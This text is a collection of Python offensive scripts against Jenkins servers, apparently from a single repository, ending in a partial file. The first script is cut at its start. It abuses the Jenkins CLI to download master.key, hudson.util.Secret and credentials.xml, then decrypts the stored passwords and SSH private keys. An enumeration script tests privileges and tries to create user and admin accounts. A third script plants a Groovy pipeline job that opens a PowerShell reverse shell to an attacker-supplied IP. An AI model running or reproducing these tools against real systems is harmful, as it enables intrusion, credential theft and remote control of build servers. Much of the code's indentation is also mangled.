with open("master.key", 'w', encoding='utf-8') as key_file:
key_file.write(ascii_chain)
print ("[>] Downloading master.key completed!")
def retrieve_credentials(WEBSITE, SESSION, PATH, PARAMS, KEY, INS_FOLDER, anon_access):
	# If anonymous has read permissions, retrieves passwords from credentials.xml
	print ("[>] Checking if stored credentials can be downloaded...")
	# java -jar jenkins-cli.jar -s http://<JENKINS_IP>:8080 connect-node @'<JENKINS_PATH>\credentials.xml'
	if anon_access == True:
		print (" [+] Extracting stored credentials from file")
	else:
		print ("[X] Can not download credentials due to lack of permissions...!")
		# Return a 3-tuple so the unpacking in main() does not fail
		return None, None, None
	# Key mapping, according to the identified Jenkins path, the key changes
key_mapping = {
"3c00003a40": "3100002f40",
"3600003440": "2b00002940",
"3d00003b40": "3200003040",
"2e00002c40": "2300002140"
}
KEY = key_mapping.get(KEY, KEY)
# Replace backslashes to slashes if requests are going to linux
path = r"/credentials.xml" if "/var/lib/jenkins" in INS_FOLDER else r"\credentials.xml"
CREDS_PATH_HEX = (INS_FOLDER + path).encode('utf-8').hex()
# CLI command in hex
line = "0000000e00000c636f6e6e6563742d6e6f6465000000" + KEY + CREDS_PATH_HEX
max_retries, retry_delay, retry_count = 3, 3, 0
while retry_count < max_retries:
hex_all = ""
try:
with ThreadPoolExecutor(max_workers=2) as executor:
# Retrieve credentials file
first_request_future = executor.submit(first_request, WEBSITE, SESSION, PATH, PARAMS)
time.sleep(1)
second_request_future = executor.submit(second_request, line, WEBSITE, SESSION, PATH, PARAMS)
hex_all = first_request_future.result()
second_request_future.result()
time.sleep(1)
				# If a response was captured, stop retrying
				if hex_all:
					break
				# An empty response counts as a failed attempt, otherwise the loop never ends
				retry_count += 1
				time.sleep(retry_delay)
except:
print (" [-] Requests not completed. Retrying...")
retry_count += 1
time.sleep(retry_delay)
if retry_count == max_retries:
print("[X] Exploit not completed after multiple attempts... Try again!")
exit()
print ("[>] Extracting credentials from Jenkins completed!")
# Receive data from the response and filter it to get usernames and passwords
ascii_text = bytes.fromhex(hex_all).decode('utf-8', errors='ignore')
user_search = re.findall(r'<username>(.*?)</username>', ascii_text)
pass_search = re.findall(r'<password>{(.*?)}</password>', ascii_text)
ssh_passphrase = re.findall(r'<passphrase>{(.*?)}</passphrase>', ascii_text)
ssh_search = re.findall(r'<privateKey>{(.*?)}</privateKey>', ascii_text)
	if not user_search and not pass_search and not ssh_search:
		print ("[-] There are no global credentials saved. Usernames, passwords or SSH keys were not found!")
		# Keep the return contract consistent even when nothing was found
		pass_found = passphrase_found = ssh_found = None
else:
# Print usernames found
if user_search:
print ("[>] Usernames found:")
users_found = tuple(set(user_search))
for users_f in users_found:
print (f" [+] {users_f}")
else:
print ("[-] There are no usernames saved in global credentials")
# Print passwords found
if pass_search:
print ("[>] Passwords found (encrypted):")
pass_found = tuple(set(pass_search))
for pass_f in pass_found:
print (f" [+] {pass_f}")
else:
pass_found = None
# Print SSH passphrases found
if ssh_passphrase:
print ("[>] SSH passphrases found (encrypted):")
passphrase_found = tuple(set(ssh_passphrase))
for passphrase_f in passphrase_found:
print (f" [+] {passphrase_f}")
else:
passphrase_found = None
# Print SSH Private keys found
if ssh_search:
print ("[>] SSH Private keys found (encrypted):")
ssh_found = tuple(set(ssh_search))
for ssh_f in ssh_found:
print (f" [+] {ssh_f[:50]}...")
else:
ssh_found = None
return pass_found, passphrase_found, ssh_found
def decrypt_passwords(pass_found, passphrase_found, ssh_found, tries=0):
# If passwords are found, start decryption process
if pass_found or passphrase_found or ssh_found:
if tries == 0:
print ("[>] Decrypting found credentials..", end='')
time.sleep(1)
decryption_magic = b'::::MAGIC::::'
# Retrieve confidentiality key
def get_confidentiality_key():
with open("master.key", 'r') as f:
master_key = f.read().encode('utf-8')
with open("hudson.util.Secret", 'rb') as f:
hudson_secret = f.read()
return decrypt_confidentiality_key(sha256(master_key).digest()[:16], hudson_secret)
# Decrypting confidentiality key
def decrypt_confidentiality_key(derived_master_key, hudson_secret):
cipher_handler = AES.new(derived_master_key, AES.MODE_ECB)
decrypted_hudson_secret = cipher_handler.decrypt(hudson_secret)
return decrypted_hudson_secret[:16] if decryption_magic in decrypted_hudson_secret else None
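		# Sanity-check sketch (sizes assumed from this script): hudson.util.Secret is
		# 272 bytes (544 hex chars), AES-128/ECB needs len % 16 == 0, and the decrypted
		# blob must contain b'::::MAGIC::::' for the first 16 bytes to be the real key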
# Decrypting secret in Jenkins (AES CBC)
def decrypt_secret(encoded_secret, confidentiality_key):
if not encoded_secret:
return
try:
encrypted_secret = base64.b64decode(encoded_secret)
iv = encrypted_secret[9:9+16]
cipher_handler = AES.new(confidentiality_key, AES.MODE_CBC, iv)
decrypted_secret = cipher_handler.decrypt(encrypted_secret[9+16:])
padding_value = decrypted_secret[-1]
secret_length = len(decrypted_secret) - padding_value
return decrypted_secret[:secret_length] if padding_value <= 16 else decrypted_secret
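			# Layout assumed here (Jenkins "new" secret format): 1 version byte plus
			# two 4-byte length fields (9 bytes total), then a 16-byte IV, then the
			# AES-CBC ciphertext with PKCS#7-style padding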
except base64.binascii.Error as error:
print (f'[X] Failed base64 decoding the input with error: {error}')
return
except:
bruteforcing_secret(pass_found, tries)
# Get confidentiality key
confidentiality_key = get_confidentiality_key()
# Decrypt every password found
if pass_found:
decrypted_list = []
for secret in pass_found:
decrypted_secret = decrypt_secret(secret, confidentiality_key)
if decrypted_secret:
decrypted_list.append(decrypted_secret)
if decrypted_list:
print (".")
print ("[>] Decrypted passwords:")
for decrypted_secret in decrypted_list:
print(" [+] " + decrypted_secret.decode('utf-8', errors='ignore'))
# Decrypt every SSH passphrase found
if passphrase_found:
decrypted_passphrase_list = []
for passphrase_secret in passphrase_found:
decrypted_passphrase_secret = decrypt_secret(passphrase_secret, confidentiality_key)
if decrypted_passphrase_secret:
decrypted_passphrase_list.append(decrypted_passphrase_secret)
if decrypted_passphrase_list:
print ("[>] Decrypted SSH passphrase:")
for decrypted_passphrase_secret in decrypted_passphrase_list:
print(" [+] " + decrypted_passphrase_secret.decode('utf-8', errors='ignore'))
# Decrypt every SSH private key found
if ssh_found:
decrypted_ssh_list = []
for ssh_secret in ssh_found:
decrypted_ssh_secret = decrypt_secret(ssh_secret, confidentiality_key)
if decrypted_ssh_secret:
decrypted_ssh_list.append(decrypted_ssh_secret)
if decrypted_ssh_list:
print ("[>] Decrypted SSH Private keys:")
for decrypted_ssh_secret in decrypted_ssh_list:
print(" [+]\n" + decrypted_ssh_secret.decode('utf-8', errors='ignore'))
else:
print ("[-] Skipping decrypting passwords...")
return
def bruteforcing_secret(pass_found, tries):
	# In case hudson.util.Secret lost its last byte, brute-force the missing value
with open("hudson.util.Secret", 'rb') as f:
hudson_secret = f.read()
hex_string = binascii.hexlify(hudson_secret).decode('utf-8')
time.sleep(0.2)
if tries == 0:
print (".\n [>] Trying to repair hudson.util.Secret binary")
print (" [ ] ", end='')
if tries % 10 == 0:
print('.', end='', flush=True)
if tries <= 255:
hex_number = hex(tries)[2:].zfill(2)
hex_string = hex_string[:-2] + hex_number
else:
print ("\n[X] Failed to decrypt passwords, binary files or encrypted passwords had errors...")
return
# Convert hex to bytes and write to a file
binary_data = bytes.fromhex(hex_string)
with open("hudson.util.Secret", 'wb') as binary_file:
binary_file.write(binary_data)
# Restart decrypting process with the modified binary file
try:
		# Pass placeholders for the passphrase/SSH fields so the positional arguments line up
		decrypt_passwords(pass_found, None, None, tries + 1)
except KeyboardInterrupt:
exit()
except:
return
def main():
args = parse_args()
WEB_URL = args.website if 'http' in args.website else 'http://' + args.website
WEB_PORT = args.webport if args.webport else 8080
WEBSITE = str(WEB_URL) + ':' + str(WEB_PORT)
# Define some items used in the requests
SESSION = str(uuid.uuid4())
PATH = "/cli"
PARAMS = {"remoting": "false"}
# Check connection to Jenkins server and Anonymous privilege level
anon_access = check_connection(WEBSITE)
# Verify in which possible folders is Jenkins installed
KEY, INS_FOLDER = get_installation_folder(WEBSITE, SESSION, PATH, PARAMS)
# Download hudson.util.Secret binary file
retrieve_hudson_secret(WEBSITE, SESSION, PATH, PARAMS, KEY, INS_FOLDER)
# Download master.key file
retrieve_master_key(WEBSITE, SESSION, PATH, PARAMS, KEY, INS_FOLDER)
# Retrieve credentials.xml to extract passwords
pass_found, passphrase_found, ssh_found = retrieve_credentials(WEBSITE, SESSION, PATH, PARAMS, KEY, INS_FOLDER, anon_access)
# If passwords are found, decrypt them
decrypt_passwords(pass_found, passphrase_found, ssh_found)
if __name__ == '__main__':
main()
print ("[>] Exploit done!")

# ============================================================
# File: enum_access.py
# Path: stevenvegar_Jenkins_scripts/enum_access.py
# ============================================================
import argparse
import base64
import json
import random
import requests
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def parse_args():
	parser = argparse.ArgumentParser(description='Enumerate which Jenkins pages and actions a given user (or anonymous) can access')
parser.add_argument('-w', '--website', type=str, required=True, help='Required. Jenkins website URL')
parser.add_argument('-wp', '--webport', type=int, help='Jenkins website port (default: 8080)')
parser.add_argument('-u','--username', type=str, help='Jenkins username (default: anonymous)')
	parser.add_argument('-p','--password', type=str, help='Jenkins password (default: empty)')
parser.add_argument('--local_proxy', action='store_true', help="Enable local proxy (default: {'http': 'http://127.0.0.1:8080'})")
return parser.parse_args()
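# Example invocation (placeholder values, not from the original script):
#   python3 enum_access.py -w http://10.10.10.10 -u admin -p admin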
def main():
args = parse_args()
WEB_URL = args.website if 'http' in args.website else 'http://' + args.website
WEB_PORT = args.webport if args.webport else 8080
WEBSITE = str(WEB_URL) + ':' + str(WEB_PORT)
USERNAME = args.username if args.username else "anonymous"
PASSWORD = args.password if args.password else ""
PROXIES = {'http': 'http://127.0.0.1:8080'} if args.local_proxy else None
if USERNAME != "anonymous":
bearer = str(base64.b64encode(bytes(USERNAME + ":" + PASSWORD, "utf-8")), encoding='ascii')
headers = {"Authorization": "Basic " + bearer}
else:
headers = None
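	# Illustrative header for assumed credentials admin:admin:
	#   Authorization: Basic YWRtaW46YWRtaW4=   (base64 of "admin:admin")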
try:
r = requests.get(WEBSITE, headers=headers, proxies=PROXIES)
#Checking connection to Jenkins server
print("[>] Connecting to Jenkins server", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
#Server information based on response headers
print ("[+] Server version: " + r.headers['Server'])
print ("[+] Jenkins version: " + r.headers['X-Jenkins'])
print ("[+] Hudson version: " + r.headers['X-Hudson'])
print ("[ ] ...")
if r.status_code == 200:
print (f"[>] Using {USERNAME} for authentication...")
print ("[+] 1. Can the user view Jenkins dashboard? YES !")
print (f" [>] {WEBSITE}/")
elif r.status_code == 403:
print (f"[>] Using {USERNAME} for authentication...")
print ("[-] 1. Can the user Jenkins dashboard? NO !")
	except Exception:
		# Guard against r being undefined when the connection itself failed
		if 'r' in locals() and r.status_code == 401:
			print (f"[>] Using {USERNAME} for authentication...")
			print ("[-] Error: Username and/or password are incorrect. Check credentials.")
			exit()
		print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
		exit()
try:
s = requests.get(WEBSITE + "/crumbIssuer/api/json", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 2. Can the user request a new \"Crumb Token\"? YES !")
jcrumb = s.json()["crumb"]
print (f" [>] Jenkins-Crumb: {jcrumb}")
		elif s.status_code == 403:
			jcrumb = "null"
			print ("[-] 2. Can the user request a new \"Crumb Token\"? NO !")
		else:
			# Any other status code still needs jcrumb defined for the later requests
			jcrumb = "null"
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/newJob", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 3. Can the user create a New Job? YES !")
print (f" [>] {WEBSITE}/newJob")
elif s.status_code == 403:
print ("[-] 3. Can the user create a New Job? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/view/all/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 4. Can the user view Existing Jobs? YES !")
print (f" [>] {WEBSITE}/view/all/")
elif s.status_code == 403:
print ("[-] 4. Can the user view Existing Jobs? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/view/all/builds", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 5. Can the user view Build History? YES !")
print (f" [>] {WEBSITE}/view/all/builds")
elif s.status_code == 403:
print ("[-] 5. Can the user view Build History? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/script", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 6. Can the user access to Script Console? YES !")
print (f" [>] {WEBSITE}/script")
elif s.status_code == 403:
print ("[-] 6. Can the user access to Script Console? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/jnlpJars/jenkins-cli.jar", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 7. Can the user Download jenkins-cli.jar? YES !")
print (f" [>] {WEBSITE}/jnlpJars/jenkins-cli.jar")
elif s.status_code == 403:
print ("[-] 7. Can the user Download jenkins-cli.jar? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/computer/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 8. Can the user view Node Information? YES !")
print (f" [>] {WEBSITE}/computer/")
elif s.status_code == 403:
print ("[-] 8. Can the user view Node Information? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/load-statistics", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 9. Can the user view Load Statistics? YES !")
print (f" [>] {WEBSITE}/load-statistics")
elif s.status_code == 403:
print ("[-] 9. Can the user view Load Statistics? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/env-vars.html/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 10. Can the user view Enviroment Variables? YES !")
print (f" [>] {WEBSITE}/env-vars.html/")
elif s.status_code == 403:
print ("[-] 10. Can the user view Enviroment Variables? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/instance-identity/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 11. Can the user view Instance Identity? YES !")
print (f" [>] {WEBSITE}/instance-identity/")
elif s.status_code == 403:
print ("[-] 11. Can the user view Instance Identity? NO !")
elif s.status_code == 404:
print ("[-] 11. Can the user view Instance Identity? NO !")
print (" [x] Credentials plugin not installed")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/administrativeMonitor/OldData/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 12. Can the user view Jenkins Old Data? YES !")
print (f" [>] {WEBSITE}/administrativeMonitor/OldData/")
elif s.status_code == 403:
print ("[-] 12. Can the user view Jenkins Old Data? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/manage", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 13. Can the user access Admin panel? YES !")
print (f" [>] {WEBSITE}/manage")
elif s.status_code == 403:
print ("[-] 13. Can the user access Admin panel? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/configfiles/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 14. Can the user view Config File Management? YES !")
print (f" [>] {WEBSITE}/configfiles/")
elif s.status_code == 403:
print ("[-] 14. Can the user view Config File Management? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/log/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 15. Can the user view logs? YES !")
print (f" [>] {WEBSITE}/log/")
elif s.status_code == 403:
print ("[-] 15. Can the user view logs? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/pluginManager/installed", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 16. Can the user view Installed Plugins? YES !")
print (f" [>] {WEBSITE}/pluginManager/installed")
elif s.status_code == 403:
print ("[-] 16. Can the user view Installed Plugins? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/configureSecurity/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 17. Can the user Configure Global Security? YES !")
print (f" [>] {WEBSITE}/configureSecurity/")
elif s.status_code == 403:
print ("[-] 17. Can the user Configure Global Security? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/configureTools/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 18. Can the user view Global Tool Configuration? YES !")
print (f" [>] {WEBSITE}/configureTools/")
elif s.status_code == 403:
print ("[-] 18. Can the user view Global Tool Configuration? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/credentials/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 19. Can the user view Credentials? YES !")
print (f" [>] {WEBSITE}/credentials/")
elif s.status_code == 403:
print ("[-] 19. Can the user view Credentials? NO !")
elif s.status_code == 404:
print ("[-] 19. Can the user view Credentials? NO !")
print (" [x] Credentials plugin not installed")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/credentials/store/system/domain/_/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 20. Can the user view Global credentials (unrestricted)? YES !")
print (f" [>] {WEBSITE}/credentials/store/system/domain/_/")
elif s.status_code == 403:
print ("[-] 20. Can the user view Global credentials (unrestricted)? NO !")
elif s.status_code == 404:
print ("[-] 20. Can the user view Global credentials (unrestricted)? NO !")
print (" [x] Credentials plugin not installed")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
random_name = "user_" + ''.join(random.choice('0123456789') for i in range(6))
data = {
"username": random_name,
"password1": random_name,
"password2": random_name,
"fullname": random_name,
"email": random_name + "@mail.com",
"Jenkins-Crumb": jcrumb,
"Submit": "Create account"}
s = requests.post(WEBSITE + "/securityRealm/createAccount", data=data, headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 21. Can the user SignUp new users? YES !")
print (f" [>] {WEBSITE}/securityRealm/user/{random_name}/")
elif s.status_code == 401:
print ("[-] 21. Can the user SignUp new users? NO !")
print (" [x] Signing Up new users is disabled")
elif s.status_code == 403:
print ("[-] 21. Can the user SignUp new users? NO !")
elif s.status_code == 404:
print ("[-] 21. Can the user SignUp new users? NO !")
print (" [x] Local authentication disabled")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
random_name = "user_" + ''.join(random.choice('0123456789') for i in range(6))
data = {
"username": random_name,
"password1": random_name,
"password2": random_name,
"fullname": random_name,
"email": random_name + "@mail.com",
"Jenkins-Crumb": jcrumb,
"Submit": "Create User"}
s = requests.post(WEBSITE + "/securityRealm/createAccountByAdmin", data=data, headers=headers, proxies=PROXIES, allow_redirects=False)
if s.status_code == 302:
print ("[+] 22. Can the user add new Admin users? YES !")
print (f" [>] {WEBSITE}/securityRealm/user/{random_name}/")
elif s.status_code == 403:
print ("[-] 22. Can the user add new Admin users? NO !")
elif s.status_code == 404:
print ("[-] 22. Can the user add new Admin users? NO !")
print (" [x] Local authentication disabled")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/asynchPeople/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 23. Can the user view local user list? YES !")
print (f" [>] {WEBSITE}/asynchPeople/")
elif s.status_code == 403:
print ("[-] 23. Can the user view local user list? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/securityRealm/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 24. Can the user view Jenkins own user database? YES !")
print (f" [>] {WEBSITE}/securityRealm/")
elif s.status_code == 403:
print ("[-] 24. Can the user view Jenkins own user database? NO !")
elif s.status_code == 404:
print ("[-] 24. Can the user view Jenkins own user database? NO !")
print (" [x] Local authentication disabled")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/ad-health/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 25. Can the user view Active Directory health? YES !")
print (f" [>] {WEBSITE}/ad-health/")
elif s.status_code == 403:
print ("[-] 25. Can the user view Active Directory health? NO !")
elif s.status_code == 404:
print ("[-] 25. Can the user view Active Directory health? NO !")
print (" [x] AD plugin not installed")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/whoAmI/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 26. Can the user view current user information? YES !")
print (f" [>] {WEBSITE}/whoAmI/")
elif s.status_code == 403:
print ("[-] 26. Can the user view current user information? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
#/plugin/email-ext
if __name__ == "__main__":
main()

# ============================================================
# File: win_revshell_groovy.py
# Path: stevenvegar_Jenkins_scripts/win_revshell_groovy.py
# ============================================================
from bs4 import BeautifulSoup
import argparse
import json
import random
import re
import requests
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def parse_args():
parser = argparse.ArgumentParser(description='Powershell reverse shell from Jenkins on a Windows-based server using Groovy script')
parser.add_argument('-w', '--website', type=str, required=True, help='Required. Jenkins website URL')
parser.add_argument('-wp', '--webport', type=int, help='Jenkins website port (default: 8080)')
parser.add_argument('-r','--reverse', type=str, required=True, help='Required. IP to receive reverse shell')
parser.add_argument('-rp','--revport', type=str, required=True, help='Required. Port to receive reverse shell')
parser.add_argument('-u','--username', type=str, help='Jenkins username (default: anonymous)')
	parser.add_argument('-p','--password', type=str, help='Jenkins password (default: empty)')
parser.add_argument('--local_proxy', action='store_true', help="Enable local proxy (default: {'http': 'http://127.0.0.1:8080'})")
return parser.parse_args()
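# Example invocation (placeholder values, not from the original script):
#   python3 win_revshell_groovy.py -w http://10.10.10.10 -r 10.10.14.3 -rp 4444 -u admin -p admin
# Start a listener first, e.g.: nc -lvnp 4444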
def main():
args = parse_args()
WEB_URL = args.website if 'http' in args.website else 'http://' + args.website
WEB_PORT = args.webport if args.webport else 8080
WEBSITE = str(WEB_URL) + ':' + str(WEB_PORT)
LOCAL_IP = args.reverse
LOCAL_PORT = args.revport
USERNAME = args.username if args.username else "anonymous"
PASSWORD = args.password if args.password else ""
PROXIES = {'http': 'http://127.0.0.1:8080'} if args.local_proxy else None
#Get the first JSESSIONID to perform login authentication
t = requests.get(WEBSITE + "/script", proxies=PROXIES)
#Checking connection to Jenkins server
if t.status_code == 403:
print("[>] Connecting to Jenkins server", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
#Baking first cookies
set_cookies1 = re.search("^(.*?);", (t.headers['Set-Cookie'])).group()
jsession1 = re.search("JSESSIONID.........",set_cookies1).group()
node_cookie1 = re.search("node(.*?);",set_cookies1).group()
cookies1 = {jsession1: node_cookie1}
#JSESSIONID.de9599e1=node03166kmkfqft11st4rulza2916212.node0;
#Server information based on response headers
print ("[+] Server version: " + t.headers['Server'])
print ("[+] Jenkins version: " + t.headers['X-Jenkins'])
print ("[+] Hudson version: " + t.headers['X-Hudson'])
#Post data to send in order to login
login_data = {
"j_username": USERNAME,
"j_password": PASSWORD,
"Submit": "Sign in"}
#Send authentication request
s = requests.post(WEBSITE + "/j_acegi_security_check", cookies=cookies1, data=login_data, allow_redirects=False, proxies=PROXIES)
#Checking connection to login portal
if s.status_code == 302:
print("[>] Authentication in progress as " + USERNAME, end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins login portal. Check URL and port.")
exit()
#Baking second cookies and checking if credentials work
set_cookies2 = re.search("^(.*?);", (s.headers['Set-Cookie'])).group()
jsession2 = re.search("JSESSIONID.........",set_cookies2)
if jsession2:
jsession2 = jsession2.group()
node_cookie2 = re.search("node(.*?);",set_cookies2).group()
print ("[+] Valid credentials!!! Authentication successful!!!")
else:
print("[-] Error: Can not perform authentication, check credentials or permissions...")
exit()
cookies2 = {jsession2: node_cookie2}
#JSESSIONID.de9599e1=node0168z3renghcpo1hhfd1dq9zy47241.node0;
#Listing all current jobs
r = requests.get(WEBSITE + "/view/all/newJob", cookies=cookies2, proxies=PROXIES)
#Checking if user is able to view current jobs
if r.status_code == 200:
print("[>] Listing existing jobs and getting Jenkins-Crumb token", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not list current jobs, user does not have the necessary privileges. Check it manually.")
	#Grabbing Jenkins-Crumb from response body (scan all scripts, a fixed index breaks across Jenkins versions)
	soup = BeautifulSoup(r.content, "html.parser")
	crumb = " ".join(sc.text for sc in soup.find_all('script'))
	jenkins_crumb = re.search("[a-f0-9]{32}", crumb).group()
#Create a random build name to avoid duplicates
build_name = "build_" + ''.join(random.choice('0123456789') for i in range(6))
#New job information and type
build_data = {
"name": build_name,
"mode": "org.jenkinsci.plugins.workflow.job.WorkflowJob",
"Jenkins-Crumb": jenkins_crumb}
#Creating a new job
q = requests.post(WEBSITE + "/view/all/createItem", data=build_data, cookies=cookies2, proxies=PROXIES)
#Checking if user is able to create new jobs
if q.status_code == 200:
print("[>] Creating a new job to spawn our reverse shell", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not create a new job, user does not have the necessary rights. Check it manually.")
#Groovy's Powershell reverse shell
#https://www.revshells.com/Groovy?ip=<IP>&port=<PORT>&shell=powershell
reverse_shell = 'node {\n\
String host = "' + str(LOCAL_IP) + '";\n\
int port = ' + str(LOCAL_PORT) + ';\n\
String cmd = "powershell";\n\
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();\n\
Socket s = new Socket(host, port);\n\
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();\n\
OutputStream po = p.getOutputStream(), so = s.getOutputStream();\n\
while (!s.isClosed()) {\n\
while (pi.available() > 0)so.write(pi.read());\n\
while (pe.available() > 0)so.write(pe.read());\n\
while (si.available() > 0)po.write(si.read());\n\
so.flush();\n\
po.flush();\n\
Thread.sleep(50);\n\
try {\n\
p.exitValue(); break;\n\
} catch (Exception e) {\n\
}\n\
};\n\
}'
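	#Note: this job type relies on the Pipeline plugins (workflow-job / workflow-cps)
	#being installed, since the Groovy above runs inside a `node { }` pipeline step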
#Configuration of the new job to execute payload
json_config = {
"definition": {
"script": reverse_shell,
"stapler-class": "org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition",
"$class": "org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition"
},
"Jenkins-Crumb": jenkins_crumb
}
#Encoding configuration data into json format
job_data = {
"Jenkins-Crumb": jenkins_crumb,
"Submit": "Save",
"json": json.dumps(json_config)
}
#Saving job configuration with reverse shell payload
p = requests.post(WEBSITE + "/job/" + build_name + "/configSubmit", data=job_data, cookies=cookies2, proxies=PROXIES)
#Checking if the job configuration is correct
if p.status_code == 200:
print("[>] Configuring job " + build_name + " with the reverse shell payload", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not configure the new job, user does not have the necessary rights. Check it manually.")
#Necessary cookies to start the job
params = {"delay": "0sec"}
crum_head = {"Jenkins-Crumb": jenkins_crumb}
#Initializing the job to execute the reverse shell
o = requests.post(WEBSITE + "/job/" + build_name + "/build", params=params, headers=crum_head, cookies=cookies2, proxies=PROXIES)
if o.status_code == 201:
print("[>] Executing the job with the reverse shell, check your listener", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not execute the new job, user does not have the necessary rights. Check it manually.")
#Finalizing script
print ("[+] Exploit executed successfully, should receive a Powershell reverse shell. Enjoy :D")
if __name__ == "__main__":
main()

# ============================================================
# File: linux_revshell_groovy.py
# Path: stevenvegar_Jenkins_scripts/linux_revshell_groovy.py
# ============================================================
from bs4 import BeautifulSoup
import argparse
import json
import random
import re
import requests
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def parse_args():
parser = argparse.ArgumentParser(description='Bash reverse shell from Jenkins on a Linux-based server using Groovy script')
parser.add_argument('-w', '--website', type=str, required=True, help='Required. Jenkins website URL')
parser.add_argument('-wp', '--webport', type=int, help='Jenkins website port (default: 8080)')
parser.add_argument('-r','--reverse', type=str, required=True, help='Required. IP to receive reverse shell')
parser.add_argument('-rp','--revport', type=str, required=True, help='Required. Port to receive reverse shell')
parser.add_argument('-u','--username', type=str, help='Jenkins username (default: anonymous)')
	parser.add_argument('-p','--password', type=str, help='Jenkins password (default: empty)')
parser.add_argument('--local_proxy', action='store_true', help="Enable local proxy (default: {'http': 'http://127.0.0.1:8080'})")
return parser.parse_args()
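# Example invocation (placeholder values, not from the original script):
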